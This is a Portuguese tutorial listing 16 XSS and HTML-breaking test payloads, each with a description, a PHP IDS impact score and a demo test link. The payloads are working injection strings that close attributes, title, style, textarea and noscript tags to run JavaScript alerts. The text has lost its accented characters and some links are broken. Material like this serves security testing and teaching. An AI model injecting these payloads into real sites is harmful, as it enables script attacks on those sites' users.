Aprenda como identificar e testar 16 vulnerabilidades com a tcnica html breaking Introduo Esse artigo de carter experimental e de demonstrao.

. Ns, do TextExpert, no nos responsabilizamos pelo uso indevido do conhecimento disponibilizado nem pelos danos causados durante a execuo dos scripts. Para testar, recomendamos acessar o site PHP IDS (http://demo.php-ids.org/) copiando e colando o scritp proposto, ou clicar no link da sesso Executar teste, disponvel em cada um dos itens descritos. PHP IDS O PHP IDS nada mais do que uma aplicao segura, que identifica entradas maliciosas por GET ou POST. Est preparado para executar cdigos e informar o nvel de impacto na aplicao. O nvel representado por nmeros, sendo que quanto maior o nmero, maior o perigo, o grau de vulnerabilidade. Um script de nvel de impacto 2 representado no PHP IDS, pode ter um nvel maior em sua aplicao, visto que depende de como o cdigo foi escrito. Os scripts aqui exemplificados no possuem instrues de acesso a banco de dados, apenas instrues JavaScript que rodam no cliente. O PHP IDS far a anlise exibindo o grau de impacto, a exibio de mensagens JavaScript no cliente. Tcnica html breaking A tcnica html breaking possui vrias maneiras que permitem ser exploradas, cada uma delas com um nome diferente. Confira abaixo 16 tipos conhecidos.

1. Advanced HTML injection locator Descrio: Esse vetor indica a injeo de HTML atravs de texto demarcado (locator). Script: <s>000<s>%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e&#60&#115&# 62&#51&#51&#51&#60&#47&#115&#62&#x3c&#x73&#x3e&#x34&#x34&#x34&#x3c&#x 2f&#x73&#x3e Tags para explorar: html breaking, injection Executar teste: Clique aqui. Impacto de nvel 11. Link: http://demo.phpids.org/?mini&test=%3Cs%3E000%3Cs%3E%253cs%253e111%253c/s%253e%253c%2573% 253e%2532%2532%2532%253c%252f%2573%253e%26%2360%26%23115%26%2362%26 %2351%26%2351%26%2351%26%2360%26%2347%26%23115%26%2362%26%23x3c%26 %23x73%26%23x3e%26%23x34% 2. Advanced XSS Locator Descrio: Cruza HTML com JavaScript. Script: ';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//-></SCRIPT>">'><SCRIPT>alert(4)</SCRIPT>=&{}");}alert(6);function xss(){// Tags para explorar: html breaking, comment breaking, JS breaking Executar teste: Clique aqui. Impacto de nvel 45.

Link: http://demo.phpids.org/?mini&test=%27%3Balert%280%29//%5C%27%3Balert%281%29//%22%3Balert%28 2%29//%5C%22%3Balert%283%29//-%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%284%29%3C/SCRIPT%3E %3D%26%7B%7D%22%29%3B%7Dalert%286%29%3Bfunction%20xss%28%29 3. Advanced XSS Locator for title-Injections Descrio: Essa a verso modificada do XSS demarcado que criei para o TestExpert para a injeo de cdigos no ttulo (tag title). Script: ';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//-></SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)%3 Tags para explorar: html breaking, comment breaking, JS breaking, title breaking Executar teste: Clique aqui. Impacto de nvel 34. Link: http://demo.phpids.org/?mini&test=%27%3Balert%280%29//%5C%27%3Balert%281%29//%22%3Balert%28 2%29//%5C%22%3Balert%283%29//-%3E%3C/SCRIPT%3E%22%3E%27%3E%3C/title%3E%3CSCRIPT%3Ealert%284%29%3C/ SCRIPT%3E%3D%26%7B%3C/title%3E%3Cscript%3Ealert%285%29%3 4. HTML Quoute & Comment breaker Descrio: Esse script usa aspas e comentrios para explorar falhas Script: '';!--"<script>alert(0);</script>=&{(alert(1))} Tags para explorar: html breaking, comment breaking Executar teste: Clique aqui. Impacto de nvel 31. Link: http://demo.php-ids.org/?mini&test=%27%27%3B%21-%22%3Cscript%3Ealert%280%29%3B%3C/script%3E%3D%26%7B%28alert%281%29%29 %7D 5. Super basic HTML breaker 2 Descrio: Script bsico para explorar falhas Script: >"' Tags para explorar: basic, super short, html breaking Executar teste: Clique aqui. Impacto de nvel 4. Link: http://demo.php-ids.org/?mini&test=%3E%22%27 6. URL breaker for double quotes Descrio: Esse script usa aspas duplas na URL para explorar falhas. Script: http://aa"><script>alert(123)</script> Tags para explorar: URL breaking, html breaking Executar teste: Clique aqui. Impacto de nvel 24. 7. URL breaker for single quotes Descrio: Esse script usa aspas simples como entrada na URL para explorar falhas Script: http://aa'><script>alert(123)</script> Tags para explorar: URL breaking, html breaking

Executar teste: Clique aqui. Impacto de nvel 24. Link: http://demo.phpids.org/?mini&test=http%3A//aa%27%3E%3Cscript%3Ealert%28123%29%3C/script%3E 8. Basic back ticked attribute breaker Descrio: Esse script pode ser usado em marcadores (checkbox) para explorar falhas Script: `> <script>alert(5)</script> Tags para explorar: html breaking Executar teste: Clique aqui. Impacto de nvel 24. Link: http://demo.phpids.org/?mini&test=%60%3E%20%3Cscript%3Ealert%285%29%3C/script%3E 9. Basic double quoted attribute breaker Descrio: Esse script permite reproduzir alertas em JavaScript Script: > <script>alert(4)</script> Tags para explorar: html breaking Executar teste: Clique aqui. Impacto de nvel 13. Link: http://demo.phpids.org/?mini&test=%3E%20%3Cscript%3Ealert%284%29%3C/script%3E 10. Basic single quoted attribute breaker Descrio: Esse script usa aspas simples para quebrar um atributo HTML e gerar alerta em javaScript Script: '> <script>alert(3)</script> Tags para explorar: html breaking, Executar teste: Clique aqui. Impacto de nvel 21. Link: http://demo.phpids.org/?mini&test=%27%3E%20%3Cscript%3Ealert%283%29%3C/script%3E 11. Basic title breaker Descrio: Esse script quebra o ttulo HTML e injeta cdigo javaScript Script: </title><script>alert(1)</script> Tags para explorar: html breaking, basic, title breaking Executar teste: Clique aqui. Impacto de nvel 13.

Link: http://demo.phpids.org/?mini&test=%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3E
12. Markup breaker with special quotes Descrio: Esse script de tags foi criado manulmente utilizando-se tags de marcao para explorar falhas existentes Script: %26%2339);x=alert;x(%26%2340 /Consegui!/.source %26%2341);// Tags para explorar: html breaking, JS breaking Executar teste: Clique aqui. Impacto de nvel 21.

Link: http://demo.phpids.org/?mini&test=%2526%252339%29%3Bx%3Dalert%3Bx%28%2526%252340%20/conse gui%21/.source%20%2526%252341%29%3B// 13. Noscript-breaker with mouseover Descrio: Esse script quebra tags noscript e adiciona eventos que reagem ao evento mouseover Script: </noscript><br><code onmouseover=a=eval;b=alert;a(b(/h/.source));>MOVE MOVA O MOUSE SOBRE ESSA AREA</code> Tags para explorar: html breaking Executar teste: Clique aqui. Impacto de nvel 34. Link: http://demo.phpids.org/?mini&test=%3C/noscript%3E%3Cbr%3E%3Ccode%20onmouseover%3Da%3Deval% 3Bb%3Dalert%3Ba%28b%28/h/.source%29%29%3B%3EMOVA%20O%20MOUSE%20SOB RE%20ESSA%20AREA%3C/code%3E 14. Style-breaker using obfuscated JavaScript Descrio: Esse script finaliza o bloco de stilos e insere JavaScript obfuscado para criar um alerta. Script: }</style><script>a=eval;b=alert;a(b(/i/.source));</script> Tags para explorar: html breaking, CSS breaking Executar teste: Clique aqui. Impacto de nvel 32. Link: http://demo.phpids.org/?mini&test=%7D%3C/style%3E%3Cscript%3Ea%3Deval%3Bb%3Dalert%3Ba%28b% 28/i/.source%29%29%3B%3C/script%3E 15. Textarea-breaker with mouseover Descrio: Esse script quebra a tag texarea e reage com o evento mouseover. Script: </textarea><br><code onmouseover=a=eval;b=alert;a(b(/g/.source));> MOVE MOVA O MOUSE SOBRE ESSA AREA </code> Tags para explorar: html breaking, obfuscated Executar teste: Clique aqui. Impacto de 38. Link: http://demo.phpids.org/?mini&test=%3C/textarea%3E%3Cbr%3E%3Ccode%20onmouseover%3Da%3Deval% 3Bb%3Dalert%3Ba%28b%28/g/.source%29%29%3B%3EMOVA%O%2020MOUSE%20SOB RE%20ESSA%20AREA%3C/code%3E 16. XSS Quick Test Descrio: se voc no tem muito espao, esse script um belo compacto XSS injection para verificao. Script: '';!--"<XSS>=&{()} Tags para explorar: html breaking, JS breaking, comment breaking Executar teste: Clique aqui. Impacto de 15. Link: http://demo.php-ids.org/?mini&test=%27%27%3B%21-%22%3CXSS%3E%3D%26%7B%28%29%7D